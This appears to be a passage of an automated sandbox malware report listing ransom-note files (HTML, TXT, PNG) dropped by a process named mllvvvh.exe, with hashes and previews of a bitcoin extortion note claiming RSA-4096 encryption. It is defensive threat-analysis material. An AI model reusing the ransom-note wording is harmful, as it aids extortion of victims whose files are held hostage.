                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{ee4aac98-c174-4941-82b1-d121e493e4fb}\Prov\RunTime\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):31424
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VS+
                  MD5:BCA5CE1B0198FF84B220280D8AD04BE0
                  SHA1:0F2A973D9EE69C964755B5BA001B2CDDEE72FD4C
                  SHA-256:1109A213B37B3E2A055C9265CC42226FAC84B723B58E898BCD382DEC22AF65CF
                  SHA-512:FCCA1EAFC553ED95D4011D4387C2435D7B0E4D7B50E791FB90B8CE670B34D50B1071C62504A16A4189FA0CC337A0BEEBB406EE034C568DAFC4AAFFF1056EAE98
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{ee4aac98-c174-4941-82b1-d121e493e4fb}\Prov\RunTime\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):271008
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifA
                  MD5:37C2E1A10DB5F9C0222F3430391A87C4
                  SHA1:DB9C8F1EA3ABAEAFD974507E66E0047852680D15
                  SHA-256:C0862DB7C0F93BD961F41DC92709FE4ECAFD3A4C0BC2CE8023D16995D007CA87
                  SHA-512:144016408E5A23DF8CD509EBA8AE45756FD6C68884ACD88DD3F023A049909E491E60D99569E66A91B54F53D54A6A79FFEF6B89D16ED1BAF5C3811F6AA4FE20D1
                  Malicious:false
                  C:\ProgramData\Microsoft\Provisioning\{ee4aac98-c174-4941-82b1-d121e493e4fb}\Prov\RunTime\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):8388
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5u
                  MD5:8030E2957B3B2A6685152C405FF4388D
                  SHA1:30E1832D030C7AD1C692924707ACE545637F12F0
                  SHA-256:1B7333F5CCE4CA0D51CB2E15717421ED84DDFE684DD264A3C750B240F7ADD4C2
                  SHA-512:DD6A7C9685A84743044BD8AA00A6C71B68E8B0257593EF43F4B7D9A735FCB373C4433EB3C893072764E1A9F752DFADED2AE17A8D44D83D174877F5F91B836980
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{ee4aac98-c174-4941-82b1-d121e493e4fb}\Prov\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{ee4aac98-c174-4941-82b1-d121e493e4fb}\Prov\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  C:\ProgramData\Microsoft\Provisioning\{ee4aac98-c174-4941-82b1-d121e493e4fb}\Prov\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{ee4aac98-c174-4941-82b1-d121e493e4fb}\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{ee4aac98-c174-4941-82b1-d121e493e4fb}\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  C:\ProgramData\Microsoft\Provisioning\{ee4aac98-c174-4941-82b1-d121e493e4fb}\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\Prov\RunTime\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):31424
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VS+
                  MD5:BCA5CE1B0198FF84B220280D8AD04BE0
                  SHA1:0F2A973D9EE69C964755B5BA001B2CDDEE72FD4C
                  SHA-256:1109A213B37B3E2A055C9265CC42226FAC84B723B58E898BCD382DEC22AF65CF
                  SHA-512:FCCA1EAFC553ED95D4011D4387C2435D7B0E4D7B50E791FB90B8CE670B34D50B1071C62504A16A4189FA0CC337A0BEEBB406EE034C568DAFC4AAFFF1056EAE98
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\Prov\RunTime\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):271008
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifA
                  MD5:37C2E1A10DB5F9C0222F3430391A87C4
                  SHA1:DB9C8F1EA3ABAEAFD974507E66E0047852680D15
                  SHA-256:C0862DB7C0F93BD961F41DC92709FE4ECAFD3A4C0BC2CE8023D16995D007CA87
                  SHA-512:144016408E5A23DF8CD509EBA8AE45756FD6C68884ACD88DD3F023A049909E491E60D99569E66A91B54F53D54A6A79FFEF6B89D16ED1BAF5C3811F6AA4FE20D1
                  Malicious:false
                  C:\ProgramData\Microsoft\Provisioning\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\Prov\RunTime\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):8388
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5u
                  MD5:8030E2957B3B2A6685152C405FF4388D
                  SHA1:30E1832D030C7AD1C692924707ACE545637F12F0
                  SHA-256:1B7333F5CCE4CA0D51CB2E15717421ED84DDFE684DD264A3C750B240F7ADD4C2
                  SHA-512:DD6A7C9685A84743044BD8AA00A6C71B68E8B0257593EF43F4B7D9A735FCB373C4433EB3C893072764E1A9F752DFADED2AE17A8D44D83D174877F5F91B836980
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\Prov\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\Prov\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  C:\ProgramData\Microsoft\Provisioning\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\Prov\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  C:\ProgramData\Microsoft\Provisioning\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\Prov\RunTime\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):31424
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VS+
                  MD5:BCA5CE1B0198FF84B220280D8AD04BE0
                  SHA1:0F2A973D9EE69C964755B5BA001B2CDDEE72FD4C
                  SHA-256:1109A213B37B3E2A055C9265CC42226FAC84B723B58E898BCD382DEC22AF65CF
                  SHA-512:FCCA1EAFC553ED95D4011D4387C2435D7B0E4D7B50E791FB90B8CE670B34D50B1071C62504A16A4189FA0CC337A0BEEBB406EE034C568DAFC4AAFFF1056EAE98
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\Prov\RunTime\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):271008
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifA
